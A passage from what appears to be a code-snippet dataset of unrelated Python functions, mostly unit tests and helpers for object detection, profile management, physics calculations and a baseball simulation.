boxes_roi[0]\n padding_x = padding_ratio * (right - left)\n padding_y = padding_ratio * (bottom - top)\n margin_x = margin_ratio * (right - left)\n margin_y = margin_ratio * (bottom - top)\n padding_left = max(int(left - padding_x), 0)\n padding_top = max(int(top - padding_y), 0)\n padding_right = min(int(right + padding_x), im_width - 1)\n padding_bottom = min(int(bottom + padding_y), im_height - 1)\n margin_left = padding_left\n margin_top = max(int(top - margin_y), 0)\n margin_right = padding_right\n margin_bottom = padding_bottom\n b_have_hand = True\n image_clone_1 = image_np.copy()\n image_clone_2 = image_np.copy()\n image_extend = image_clone_1[margin_top:margin_bottom,\n margin_left:margin_right]\n image_roi = image_clone_2[padding_top:padding_bottom,\n padding_left:padding_right]\n cv2.rectangle(image_np, (margin_left, margin_top),\n 
(margin_right, margin_bottom), (0, 255, 255), 2, 1)\n cv2.putText(image_np, str(float('%.2f' % scores_roi[0])),\n (int(margin_left), int(margin_top)-2),\n cv2.FONT_HERSHEY_SIMPLEX, 0.75,\n (0, 255, 100), 2)\n print('here')\n return b_have_hand, image_roi, image_extend\n except Exception as e:\n b_have_hand = False\n image_roi = np.zeros((150, 150, 3), np.uint8)\n return b_have_hand, image_roi, image_roi", "def test_basic(self):\n new_name = \"probability_of_snowfall\"\n test_cube = set_up_percentiles_cube()\n inverse_ordering = False\n expected = ('<ProbabilitiesFromPercentiles2D: percentiles_'\n 'cube: {}, output_name: {}, inverse_ordering: {}'.format(\n test_cube, new_name, inverse_ordering))\n result = str(ProbabilitiesFromPercentiles2D(test_cube,\n new_name))\n self.assertEqual(result, expected)", "def verify_server_profile_status(expectedserverstatus, *profile_obj):\n\n logger._log_to_console_and_log_file(\"\")\n logger._log_to_console_and_log_file(\"Verifying the list of server hardwares present in the server Profile page..\")\n selenium2lib = ui_lib.get_s2l()\n\n # if ui_lib.wait_for_element_visible(FusionServerProfilesPage.ID_PROFILE_LIST, PerfConstants.DEFAULT_SYNC_TIME):\n # logger._log_to_console_and_log_file(\"Sever Profile Page contains a Server Profile List Table and starting to verify the servers status..\")\n # else:\n # logger._warn(\"Sever Profile Page does not contains a Server Profile List Table and Hence failing the test..\")\n # return False\n\n if ui_lib.wait_for_element_visible(FusionServerProfilesPage.ID_NO_SERVER_PROFILE, PerfConstants.DEFAULT_SYNC_TIME):\n logger._warn(\"Sever Profile Page does not contains a any Server and Hence failing the test..\")\n selenium2lib.capture_page_screenshot()\n return False\n # else:\n # logger._log_to_console_and_log_file(\"Sever Profile Page contains a Servers and starting to verify the servers status..\")\n\n # if not ui_lib.wait_for_element_visible(FusionServerProfilesPage.ID_SELECT_SERVER % serverhardware, PerfConstants.DEFAULT_SYNC_TIME):\n # logger._warn(\"Server Hardware : \" + serverhardware + \" is not present in the ServerList of the Server Profile page\")\n # return False\n # else:\n # logger._log_to_console_and_log_file(\"Server Hardware : \" + serverhardware + \" is present in the ServerList and Hence verifying for the status..\")\n\n for profile in profile_obj:\n server_hardware = profile.server\n\n logger._log_to_console_and_log_file(\"Verifying status for profile %s\" % profile.name)\n\n if server_hardware == 'unassigned':\n logger._log_to_console_and_log_file(\"Server hardware is unassigned and cannot verify the server's power status\")\n continue\n\n ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_ELEMENT_PROFILE_NAME_BASE % profile.name)\n ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_ELEMENT_PROFILE_NAME_BASE % profile.name)\n BuiltIn().sleep(2) # wait for fields to load\n\n # ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_SELECT_SERVER % server_hardware)\n if ui_lib.wait_for_element_visible(FusionServerProfilesPage.ID_SERVER_STATUS_OK, PerfConstants.DEFAULT_SYNC_TIME):\n if expectedserverstatus == 'OK':\n logger._log_to_console_and_log_file(\"Server status of server : \" + server_hardware + \" is in state : 'OK' as expected\")\n else:\n logger._log_to_console_and_log_file(\"Server status of server : \" + server_hardware + \" is in state : 'OK' as NOT expected\")\n selenium2lib.capture_page_screenshot()\n return False\n elif 
ui_lib.wait_for_element_visible(FusionServerProfilesPage.ID_SERVER_STATUS_ERROR, PerfConstants.DEFAULT_SYNC_TIME):\n ui_lib.wait_for_element_visible(FusionServerProfilesPage.ID_ERROR_WARN_MSG, PerfConstants.DEFAULT_SYNC_TIME)\n err_msg = selenium2lib.get_text(FusionServerProfilesPage.ID_ERROR_WARN_MSG)\n logger._log_to_console_and_log_file(\"Server status of server : \" + server_hardware + \" is in state : 'ERROR' with the error msg : '\" + err_msg + \"'\")\n if expectedserverstatus == 'ERROR':\n logger._log_to_console_and_log_file(\"Server status of server : is in state : 'ERROR' as expected\")\n else:\n logger._log_to_console_and_log_file(\"Server status of server : is in state : 'ERROR' as NOT expected\")\n selenium2lib.capture_page_screenshot()\n return False\n else:\n ui_lib.wait_for_element_visible(FusionServerProfilesPage.ID_ERROR_WARN_MSG, PerfConstants.DEFAULT_SYNC_TIME)\n err_msg = selenium2lib.get_text(FusionServerProfilesPage.ID_ERROR_WARN_MSG)\n logger._log_to_console_and_log_file(\"Server status of server : \" + server_hardware + \" is in state : 'WARNING' with the warning msg : '\" + err_msg + \"'\")\n if expectedserverstatus == 'WARNING':\n logger._log_to_console_and_log_file(\"Server status of server : is in state : 'WARNING' as expected\")\n else:\n logger._log_to_console_and_log_file(\"Server status of server : is in state : 'WARNING' as NOT expected\")\n selenium2lib.capture_page_screenshot()\n return False\n\n return True", "def test_profile(profile_manager):\n name = 'test_profile'\n yield profile_manager.create(name)\n if profile_manager.has_profile(name):\n profile_manager.delete(name)", "def test_boxnet(self):\n\t\timg = np.random.rand(2, 3, 256, 128)\n\t\t\n\t\tvgg = VGGNet()\n\t\tboxnet = BoxNet()\n\n\t\tfm = vgg(img)\n\t\tboxes = boxnet(fm)\n\n\t\tnp.testing.assert_equal(boxes.shape, (2,6,256/2**4,128/2**4))\n\n\t\t\"\"\" Dimension check with random shifts \"\"\"\n\n\t\t\"\"\" Visualize boxes with random shifts \"\"\"", "def test_profile_made(self):\n self.assertTrue(ImagerProfile.objects.count() == 5)", "def test_is_instance(self):\n self.assertTrue(isinstance(self.profile, Profile))", "def test_boundary_boxes(gt_detection_combo):\n found = False\n overlap_threshold = 0.7\n\n for found_box in gt_detection_combo.detected_boxes:\n if overlap_between(gt_detection_combo.gt_box, found_box) > overlap_threshold:\n found = True\n break\n\n assert found is True", "def check_benchmark_result(result, expectation):\n for storage_cfg, caches in result['cache_data'].items():\n for cache, percent_recorded in caches.items():\n if ((percent_recorded['min'] < expectation['min'])\n or (percent_recorded['avg'] < expectation['avg'])\n or (percent_recorded['max'] < expectation['max'])):\n return False\n return True", "def test_ML_check_profile_epem_ttx(self):\n\n self.setup_logFile_for_logger('madgraph.check_cmd')\n try:\n cmd = os.getcwd()\n self.do('import model loop_sm')\n if path.isdir(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx')):\n shutil.rmtree(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx'))\n \n # Make sure it works for an initial run\n self.do('check profile -reuse e+ e- > t t~ [virt=QCD]')\n self.assertEqual(cmd, os.getcwd())\n self.assertTrue(path.isdir(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx')))\n self.assertTrue(path.isfile(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx',\\\n 'SubProcesses/P0_epem_ttx/result.dat')))\n self.assertTrue(path.isfile(self.tmp_path['madgraph.check_cmd']))\n res = open(self.tmp_path['madgraph.check_cmd']).read()\n self.assertTrue('Generation time total' in res)\n 
self.assertTrue('Executable size' in res)\n self.assertTrue('Tool (DoublePrec for CT)' in res)\n self.assertTrue('Number of Unstable PS points' in res)\n self.assertTrue(res.count('NA')<=3)\n\n # Now for a Reuse-run\n self.setup_logFile_for_logger('madgraph.check_cmd',restore=True)\n self.setup_logFile_for_logger('madgraph.check_cmd')\n self.do('check profile -reuse e+ e- > t t~ [virt=QCD]')\n self.assertEqual(cmd, os.getcwd())\n self.assertTrue(path.isdir(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx')))\n self.assertTrue(path.isfile(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx',\\\n 'SubProcesses/P0_epem_ttx/result.dat')))\n shutil.rmtree(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx'))\n self.assertTrue(path.isfile(self.tmp_path['madgraph.check_cmd']))\n res = open(self.tmp_path['madgraph.check_cmd']).read()\n self.assertTrue('Generation time total' in res)\n self.assertTrue('Executable size' in res)\n self.assertTrue('Tool (DoublePrec for CT)' in res)\n self.assertTrue('Number of Unstable PS points' in res)\n self.assertTrue(res.count('NA')<=11)\n except:\n self.setup_logFile_for_logger('madgraph.check_cmd',restore=True)\n if path.isdir(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx')):\n shutil.rmtree(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx'))\n raise\n self.setup_logFile_for_logger('madgraph.check_cmd',restore=True)", "def draw_boxes(image, results, min_score=0.2, max_boxes=10):\n results = sorted(results, key=lambda x: x['score'])\n results = results[0:max_boxes]\n for r in results:\n if r['score'] < min_score:\n continue\n draw_box(image, r['bounding_box'], labels[r['class_id']], r['score'])", "async def test_retrieve_one(self):\n expected = {\n '_id': 'id',\n 'name': 'name',\n 'version': 4,\n 'status': 'active'\n }\n rsps = respx.get(f'{PROVISIONING_API_URL}/users/current/provisioning-profiles/id') \\\n .mock(return_value=Response(200, json=expected))\n profile = await provisioning_client.get_provisioning_profile('id')\n assert rsps.calls[0].request.url == \\\n f'{PROVISIONING_API_URL}/users/current/provisioning-profiles/id'\n assert rsps.calls[0].request.headers['auth-token'] == 'header.payload.sign'\n assert profile == expected", "def test_parcel_profile():\n levels = np.array([1000., 900., 800., 700., 600., 500., 400.]) * units.mbar\n true_prof = np.array([303.15, 294.16, 288.026, 283.073, 277.058, 269.402,\n 258.966]) * units.kelvin\n\n prof = parcel_profile(levels, 30. * units.degC, 20. 
* units.degC)\n assert_array_almost_equal(prof, true_prof, 2)", "def _run_test_case(radio, lines):\n calc_reachable_surface_and_people(radio, lines)", "def test_get_spawning_profile_list():\n center = Coordinates(1 , 1)\n radius = 10\n speed_limit = 20\n default_driver = DriverProfile(\"Default\", 8, 2, 2, 0, 30, 3, 1)\n default_vehicle = VehicleProfile(\"Default\", 5, 15, 2, 2, 1000, 65)\n default_spawn = SpawningProfile(\"Default\", default_driver, default_vehicle)\n\n i = Intersection(center, radius, speed_limit)\n\n l = i.get_spawning_profile_list()\n\n assert not l\n\n i.add_spawning_profile(default_spawn)\n\n assert l\n\n assert len(l) == 1\n\n i.remove_spawning_profile(default_spawn)\n\n assert len(l) == 0\n assert not l", "def _get_boxes(self, output, mode=1):\n\n # Check dimensions\n if output.dim() == 3:\n output.unsqueeze_(0)\n\n # Variables\n cuda = output.is_cuda\n batch = output.size(0)\n h = output.size(2)\n w = output.size(3)\n\n # Compute xc,yc, w,h, box_score on Tensor\n lin_x = torch.linspace(0, w-1, w).repeat(h,1).view(h*w)\n lin_y = torch.linspace(0, h-1, h).repeat(w,1).t().contiguous().view(h*w)\n anchor_w = torch.Tensor(self.anchors[::2]).view(1, self.num_anchors, 1)\n anchor_h = torch.Tensor(self.anchors[1::2]).view(1, self.num_anchors, 1)\n if cuda:\n lin_x = lin_x.cuda()\n lin_y = lin_y.cuda()\n anchor_w = anchor_w.cuda()\n anchor_h = anchor_h.cuda()\n\n output_ = output.view(batch, self.num_anchors, -1, h*w) # -1 == 5+num_classes (we can drop feature maps if 1 class)\n output_[:,:,0,:].sigmoid_().add_(lin_x).div_(w) # X center\n output_[:,:,1,:].sigmoid_().add_(lin_y).div_(h) # Y center\n output_[:,:,2,:].exp_().mul_(anchor_w).div_(w) # Width\n output_[:,:,3,:].exp_().mul_(anchor_h).div_(h) # Height\n output_[:,:,4,:].sigmoid_() # Box score\n\n # Compute class_score\n if self.num_classes > 1:\n if torch.__version__.startswith('0.3'):\n cls_scores = torch.nn.functional.softmax(Variable(output_[:,:,5:,:], volatile=True), 2).data\n else:\n cls_scores = torch.nn.functional.softmax(output_[:,:,5:,:], 2)\n cls_max, cls_max_idx = torch.max(cls_scores, 2)\n cls_max.mul_(output_[:,:,4,:])\n else:\n cls_max = output_[:,:,4,:]\n cls_max_idx = torch.zeros_like(cls_max)\n\n # Save detection if conf*class_conf is higher than threshold\n\n if mode == 0:\n output_ = output_.cpu()\n cls_max = cls_max.cpu()\n cls_max_idx = cls_max_idx.cpu()\n boxes = []\n for b in range(batch):\n box_batch = []\n for a in range(self.num_anchors):\n for i in range(h*w):\n if cls_max[b,a,i] > self.conf_thresh:\n box_batch.append([\n output_[b,a,0,i],\n output_[b,a,1,i],\n output_[b,a,2,i],\n output_[b,a,3,i],\n cls_max[b,a,i],\n cls_max_idx[b,a,i]\n ])\n box_batch = torch.Tensor(box_batch)\n boxes.append(box_batch)\n elif mode == 1 or mode == 2:\n # Save detection if conf*class_conf is higher than threshold\n flags = cls_max > self.conf_thresh\n flat_flags = flags.view(-1)\n\n # number of potential detections per batch\n item_size = np.prod(flags.shape[1:])\n slices = [slice((item_size * i), (item_size * (i + 1))) for i in range(batch)]\n # number of detections per batch (prepended with a zero)\n n_dets = torch.stack([flat_flags[0].long() * 0] + [flat_flags[sl].long().sum() for sl in slices])\n # indices of splits between filtered detections\n filtered_split_idxs = torch.cumsum(n_dets, dim=0)\n\n # Do actual filtering of detections by confidence thresh\n flat_coords = output_.transpose(2, 3)[..., 0:4].clone().view(-1, 4)\n flat_class_max = cls_max.view(-1)\n flat_class_idx = cls_max_idx.view(-1)\n\n 
coords = flat_coords[flat_flags]\n scores = flat_class_max[flat_flags]\n cls_idxs = flat_class_idx[flat_flags]\n\n filtered_dets = torch.cat([coords, scores[:, None],\n cls_idxs[:, None].float()], dim=1)\n\n boxes2 = []\n for lx, rx in zip(filtered_split_idxs, filtered_split_idxs[1:]):\n batch_box = filtered_dets[lx:rx]\n boxes2.append(batch_box)\n\n if False:\n boxes3 = [torch.Tensor(box) for box in boxes]\n list(map(len, boxes2))\n list(map(len, boxes3))\n for b2, b3 in zip(boxes3, boxes2):\n assert np.all(b2.cpu() == b3.cpu())\n\n boxes = boxes2\n\n return boxes", "def test_create_profile(self):\n self.cim.create_profile(\n card_number=u\"42222222222\",\n expiration_date=u\"2010-04\",\n customer_id=u\"dialtone\"\n )\n\n def assert_other(message):\n assert 'creditCardNumber' not in message\n assert 'bankAccount' in message\n self.assert_other = assert_other\n try:\n self.cim.create_profile(\n customer_id=u\"dialtone\",\n profile_type=u\"bank\",\n name_on_account=u\"John Doe\",\n routing_number=u\"12345678\",\n account_number=u\"1234567890\"\n )\n finally:\n del self.assert_other\n\n self.cim.create_profile(\n card_number=u\"42222222222\",\n expiration_date=u\"2010-04\",\n customer_id=u\"dialtone\",\n ship_phone=u'415-415-4154',\n ship_first_name=u'valentino'\n )\n\n payment_profiles = [\n dict(card_number=u\"43333333333\",\n expiration_date=u\"2010-04\"),\n dict(profile_type=u\"bank\",\n name_on_account=u\"John Doeð\",\n routing_number=u\"12345678\",\n account_number=u\"1234567890\")\n ]\n\n def assert_other(message):\n assert 'John Doe' in message\n assert '43333333333' in message\n assert 'valentino' in message\n self.assert_other = assert_other\n try:\n self.cim.create_profile(\n customer_id=u\"dialtone\",\n payment_profiles=payment_profiles,\n ship_phone=u\"415-415-4154\",\n ship_first_name=u\"valentino\"\n )\n finally:\n del self.assert_other", "def test_get_cache(self):\r\n profile1 = self.profile_manager.get('testing')\r\n profile2 = self.profile_manager.get('testing')\r\n self.assertEqual(profile1, profile2)", "def test_profile_image_requested_field(self):\n self.register_get_user_response(self.user)\n cs_thread = make_minimal_cs_thread({\n \"id\": self.thread_id,\n \"course_id\": str(self.course.id),\n \"username\": self.user.username,\n \"user_id\": str(self.user.id),\n })\n self.register_get_thread_response(cs_thread)\n self.create_profile_image(self.user, get_profile_image_storage())\n response = self.client.get(self.url, {\"requested_fields\": \"profile_image\"})\n assert response.status_code == 200\n expected_profile_data = self.get_expected_user_profile(self.user.username)\n response_users = json.loads(response.content.decode('utf-8'))['users']\n assert expected_profile_data == response_users[self.user.username]", "def checkProfileEquality(self, profile1, profile2):\n if len(profile1) != len(profile2) or len(profile1[0]) != len(profile2[0]):\n return False\n for gram1 in profile1:\n contains = False\n for gram2 in profile2:\n if gram1 == gram2:\n contains = True\n break\n if contains == False:\n return False\n return True", "def test_nominal_case(self):\n\n image_filename, boxes = list(annotation.read(self.filename))\n self.assertEqual(image_filename, 'image.jpg')\n self.assertEqual(len(boxes), 2)\n width = 400\n height = 300\n b = boxes[0]\n self.assertEqual(b.xmin, 10 / width)\n self.assertEqual(b.ymin, 20 / height)\n self.assertEqual(b.xmax, 30 / width)\n self.assertEqual(b.ymax, 40 / height)", "def runTest(self):\n change = EtcProposalsChangeStub()\n controller = 
EtcProposalsControllerStub()\n changestatus = EtcProposalChangeStatus(change, controller)\n self.testbox.pack_start(changestatus, False, False, 1)\n gtk.main()\n self.failIf(self.Failed, 'Test failed.')", "def test_creation_profile_1():\n assert tuple_NT[0][0] == LIST_dict[0]['name'], \"Name is not getting stored properly\"", "def evaluate_detections(self, all_boxes, output_dir=None):\n raise NotImplementedError", "def test_default_box_simple() :\n kwargs = {\n 'image_size' : 160,\n 'steps' : [8, 16, 32],\n 'aspect_ratios' : [1],\n 'variance' : [0.1, 0.2],\n 'clip' : 1,\n }\n default_box = DefaultBox(**kwargs)\n boxes = default_box()\n assert torch.all(eq(\n default_box.feature_maps,\n tensor([20, 10, 5])\n ))\n assert default_box.anchors.dim() == 3\n \"\"\"\n 3 -> number of feature maps\n 2 -> n aspect ratio (+1)\n 2 -> width and height value\n \"\"\"\n assert default_box.anchors.size() == Size([3,2,2])\n assert boxes.dim() == 2\n \"\"\"\n (20*20+10*10+5*5)*2 -> number of feature maps (grids) * number of aspect ratios\n 2+2 -> cxywh\n \"\"\"\n assert boxes.size() == Size([(20*20+10*10+5*5)*2,2+2])\n kwargs = {\n 'image_size' : 160,\n 'steps' : [8, 16, 32],\n 'aspect_ratios' : [2, 3],\n 'variance' : [0.1, 0.2],\n 'clip' : 1,\n }\n default_box = DefaultBox(**kwargs)\n boxes = default_box()\n assert torch.all(eq(\n default_box.feature_maps,\n tensor([20, 10, 5])\n ))\n assert default_box.anchors.dim() == 3\n \"\"\"\n 3 -> number of feature maps\n 4 -> n aspect ratio * 2 (for 1/2 and 1/3)\n 2 -> width and height value\n \"\"\"\n assert default_box.anchors.size() == Size([3,4,2])\n assert boxes.dim() == 2\n \"\"\"\n (20*20+10*10+5*5)*4 -> number of feature maps (grids) * number of aspect ratios\n 2+2 -> cxywh\n \"\"\"\n assert boxes.size() == Size([(20*20+10*10+5*5)*4,2+2])", "def run_test_wait_for_sum_of_cubes():\n # -------------------------------------------------------------------------\n # TODO: 8. Implement this TEST function.\n # It TESTS the wait_for_sum_of_cubes function defined below.\n # Include at least ** 20 ** tests. (We supplied 18 tests for you.)\n # __\n # As usual, include both EXPECTED and ACTUAL results in your test\n # and compute the latter BY HAND (not by running your program).\n # -------------------------------------------------------------------------\n print()\n print(\"--------------------------------------------------\")\n print(\"Testing the wait_for_sum_of_cubes function:\")\n print(\"--------------------------------------------------\")\n\n format_string = \" wait_for_sum_of_cubes( {} )\"\n test_results = [0, 0] # Number of tests passed, failed.\n\n # Test 1:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 2\n print_expected_result_of_test([4.3], expected, test_results, format_string)\n actual = wait_for_sum_of_cubes(4.3)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 2:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 1\n print_expected_result_of_test([1], expected, test_results, format_string)\n actual = wait_for_sum_of_cubes(1)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 3:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 2\n print_expected_result_of_test([1.000000000001], expected, test_results,\n format_string)\n actual = wait_for_sum_of_cubes(1.000000000001)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 4:\n print()\n print(\"TEST STARTED! 
Has it ended?\")\n expected = 2\n print_expected_result_of_test([9], expected, test_results, format_string)\n actual = wait_for_sum_of_cubes(9)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 5:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 3\n print_expected_result_of_test([9.000000000001], expected, test_results,\n format_string)\n actual = wait_for_sum_of_cubes(9.000000000001)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 6:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 3\n print_expected_result_of_test([35.9999999999999], expected, test_results,\n format_string)\n actual = wait_for_sum_of_cubes(35.9999999999999)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 7:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 3\n print_expected_result_of_test([36], expected, test_results, format_string)\n actual = wait_for_sum_of_cubes(36)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 8:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 4\n print_expected_result_of_test([36.0000001], expected, test_results,\n format_string)\n actual = wait_for_sum_of_cubes(36.0000001)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 9:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 4\n print_expected_result_of_test([58], expected, test_results, format_string)\n actual = wait_for_sum_of_cubes(58)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 10:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 4\n print_expected_result_of_test([100], expected, test_results, format_string)\n actual = wait_for_sum_of_cubes(100)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 11:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 5\n print_expected_result_of_test([100.00000001], expected, test_results,\n format_string)\n actual = wait_for_sum_of_cubes(100.00000001)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 12:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 8\n print_expected_result_of_test([1000], expected, test_results,\n format_string)\n actual = wait_for_sum_of_cubes(1000)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 13:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 1\n print_expected_result_of_test([-4.2], expected, test_results,\n format_string)\n actual = wait_for_sum_of_cubes(-4.2)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 14:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 8\n print_expected_result_of_test([1296], expected, test_results,\n format_string)\n actual = wait_for_sum_of_cubes(1296)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 15:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 9\n print_expected_result_of_test([1296.00000001], expected, test_results,\n format_string)\n actual = wait_for_sum_of_cubes(1296.00000001)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 16:\n print()\n print(\"TEST STARTED! 
Has it ended?\")\n expected = 25\n print_expected_result_of_test([100000], expected, test_results,\n format_string)\n actual = wait_for_sum_of_cubes(100000)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 17:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 38\n print_expected_result_of_test([500000], expected, test_results,\n format_string)\n actual = wait_for_sum_of_cubes(500000)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 18:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 251\n print_expected_result_of_test([1000000000], expected, test_results,\n format_string)\n actual = wait_for_sum_of_cubes(1000000000)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # -------------------------------------------------------------------------\n # TODO: 8 (continued):\n # PUT YOUR TEST ** IN THE SPACE BETWEEN ** the\n # print(\"TEST STARTED!\" ...) and print(\"TEST ENDED\") lines below.\n # __\n # *** Use wait_for_sum_of_cubes(30.33) as your test here.\n # Compute the expected answer BY HAND, as always.\n # -------------------------------------------------------------------------\n # Test 19:\n print()\n print(\"TEST STARTED! Has it ended?\")\n\n print(\"TEST ENDED!\")\n\n # -------------------------------------------------------------------------\n # TODO: 8 (continued):\n # PUT YOUR TEST ** IN THE SPACE BETWEEN ** the\n # print(\"TEST STARTED!\" ...) and print(\"TEST ENDED\") lines below.\n # -------------------------------------------------------------------------\n # Test 20:\n print()\n print(\"TEST STARTED! Has it ended?\")\n\n print(\"TEST ENDED!\")\n\n # SUMMARY of test results:\n print_summary_of_test_results(test_results)", "def evaluate_strategy_profile(self, yield_outcomes=False):\n if self.profile_queue:\n s = self.profile_queue.pop(0)\n if s not in self.active_strategy_profiles:\n self.active_strategy_profiles.append(s)\n game_outcome = self.G.observe_result(s)\n if yield_outcomes:\n yield s, game_outcome\n self.update_mean_and_count(s, game_outcome)", "def update(self, result):\n\n runs_scored = 0\n outs_recorded = 0\n\n if result == 'single':\n # Runners from 2b or 3b score first\n if self.occupied_2b and self.occupied_3b:\n self.occupied_2b = False\n self.occupied_3b = False\n runs_scored += 2\n elif self.occupied_2b or self.occupied_3b:\n self.occupied_2b = False\n self.occupied_3b = False\n runs_scored += 1\n # Runners from first advance\n if self.occupied_1b:\n self.occupied_2b = True\n # First base now occupied\n self.occupied_1b = True\n\n if result == 'double':\n # Runners from 2b or 3b score\n if self.occupied_2b and self.occupied_3b:\n self.occupied_2b = False\n self.occupied_3b = False\n runs_scored += 2\n elif self.occupied_2b or self.occupied_3b:\n self.occupied_2b = False\n self.occupied_3b = False\n runs_scored += 1\n # Runner on 1st (see notes)\n if self.occupied_1b:\n rand = random.uniform(0,1)\n if rand < 0.4:\n runs_scored +=1\n else:\n self.occupied_3b = True\n self.occupied_1b = False\n \n if result == 'triple':\n # Everyone on base scores\n number_bases_occupied = self.occupied_1b + self.occupied_2b + self.occupied_3b\n runs_scored += number_bases_occupied\n # New runner on 3b\n self.occupied_3b = True\n\n if result == 'home run':\n number_bases_occupied = self.occupied_1b + self.occupied_2b + self.occupied_3b\n runs_scored += number_bases_occupied + 1\n\n if result == 'foul out' or result 
== 'fly out' or result == 'out at 1st' or result == 'strike out':\n outs_recorded += 1\n\n if result == 'double play':\n # This is weird, since dps aren't always possible. See notes.\n \n if self.occupied_1b + self.occupied_2b + self.occupied_3b == 0:\n # If nobody on base, just a normal out\n outs_recorded +=1\n \n ## 1 existing Baserunner scenario\n elif self.occupied_1b and not self.occupied_2b and not self.occupied_3b:\n # If on first, outs at 1b and 2b\n self.occupied_1b = False\n outs_recorded += 2\n elif (not self.occupied_1b and self.occupied_2b and not self.occupied_3b):\n # If baserunner on second, no force outs, just add an out\n outs_recorded += 1\n elif (not self.occupied_1b and not self.occupied_2b and self.occupied_3b):\n # If baserunner on third, same\n outs_recorded += 1\n\n ## 2 existing Baserunner scenario\n elif self.occupied_1b and self.occupied_2b and not self.occupied_3b:\n # If on 1st and 2nd, outs at 3rd and 2nd\n self.occupied_1b = True\n self.occupied_2b = False\n outs_recorded += 2\n elif self.occupied_1b and not self.occupied_2b and self.occupied_3b:\n # If on 1st and 3nd, outs at 2rd and 1st\n self.occupied_1b = False\n outs_recorded += 2\n elif not self.occupied_1b and self.occupied_2b and self.occupied_3b: \n # If 2b and 3b occupied, only force out at 1b, so base/out doesn't change\n outs_recorded += 1\n\n ## 3 existing Baserunner scneario\n elif self.occupied_1b and self.occupied_2b and self.occupied_3b: \n # If bases loaded, outs at home and 3b. 2b and 1b stay occupied\n self.occupied_3b = False\n outs_recorded += 2\n\n\n if result == 'base on error':\n # Everyone advances\n if self.occupied_3b:\n runs_scored += 1\n self.occupied_3b = False\n if self.occupied_2b:\n self.occupied_3b = True\n self.occupied_2b = False\n if self.occupied_1b:\n self.occupied_2b = True\n self.occupied_1b = False\n self.occupied_1b = True\n\n\n if result == 'base on balls':\n if self.occupied_3b and self.occupied_2b and self.occupied_1b:\n runs_scored += 1\n if self.occupied_2b and self.occupied_1b:\n self.occupied_3b = True\n if self.occupied_1b:\n self.occupied_2b = True\n self.occupied_1b = True \n\n return runs_scored, outs_recorded", "def run():\n tests = [\n # [\n # [\"\", \"sumRange\", \"sumRange\", \"sumRange\", \"update\", \"sumRange\", \"sumRange\", \"sumRange\"],\n # [[1, 2, 3, 4, 5], [0, 2], [1, 2], [1, 3], [1, 3], [0, 2], [1, 2], [0, 1]]\n # ],\n [\n [\"NumArray\", \"sumRange\", \"update\", \"sumRange\"],\n [[-1], [0, 0], [0, 1], [0, 0]]\n ]\n ]\n\n results = [\n # [None, 3, 2, 5, None, 4, 2, 2],\n [None, -1, None, 1],\n\n ]\n for test, res in zip(tests, results):\n print('-----'*20)\n cmds, params = test\n cmds.pop(0)\n p = params.pop(0)\n res.pop(0)\n obj = BIT(p)\n for cmd, param, exp in zip(cmds, params, res):\n v = getattr(obj, cmd)(*param)\n print(obj)\n print(f'------\\n{cmd}, {param} --> {v} : {exp}')\n assert exp == v", "def test_resultingGoose_outside(self):\n goose = coordinate.Coordinate(5, 5)\n actual_result = rules.resultingGoose(types.GOOSE, goose)\n expected_result = types.GOOSE\n self.assertEqual(actual_result, expected_result)", "def test_output_ensure_output_for_property(profile_from_dataset):\n output = 